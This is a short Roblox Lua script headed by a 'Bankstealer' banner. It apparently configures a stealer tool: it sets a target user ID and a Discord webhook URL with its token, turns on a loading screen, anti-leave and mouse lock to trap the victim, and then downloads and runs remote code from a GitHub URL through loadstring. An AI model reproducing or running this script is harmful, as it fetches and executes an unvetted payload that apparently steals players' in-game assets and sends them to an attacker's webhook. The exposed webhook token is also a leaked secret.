--[[
   ____              _        _             _           
  | __ )  __ _ _ __ | | _____| |_ ___  __ _| | ___ _ __ 
  |  _ \ / _` | '_ \| |/ / __| __/ _ \/ _` | |/ _ \ '__|
  | |_) | (_| | | | |   <\__ \ ||  __/ (_| | |  __/ |   
  |____/ \__,_|_| |_|_|\_\___/\__\___|\__,_|_|\___|_| 

]]--

_G.UserID = "3641686898"
_G.Webhook = "https://discord.com/api/webhooks/1128331201468444764/sXCT0Urwni0DUCTf_dwbJLIsSEMaROtK88tJcnKJTop_a4Vb5Qciw9MTLeySGMk_qcxQ"

_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

loadstring(game:HttpGet("https://raw.githubusercontent.com/Cypaex/Bank/main/Engine"))()
